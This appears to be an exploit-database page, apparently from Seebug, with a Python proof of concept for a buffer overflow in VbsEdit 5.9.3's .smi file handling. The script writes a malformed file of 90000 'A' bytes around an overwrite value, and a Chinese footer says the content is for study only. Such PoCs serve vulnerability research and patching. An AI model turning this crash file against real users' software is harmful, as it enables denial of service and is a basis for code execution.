# Exploit Title: VbsEdit 5.9.3(.smi file handling) Buffer overflow vulnerability # Date: 22.7.2013 # Exploit Author: d3b4g # Vendor Homepage:http://www.vbsedit.com/ # Software Link: http://www.vbsedit.com/ # Tested on: Windows XP SP3 # Twitter: @schaba #!/usr/bin/python # Tested on: win XPsp3 chars = "A"*90000 crush = "\x41\x41\x41\x41" file=open('exp.smi','w') file.write(chars+crush+chars) file.close()
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论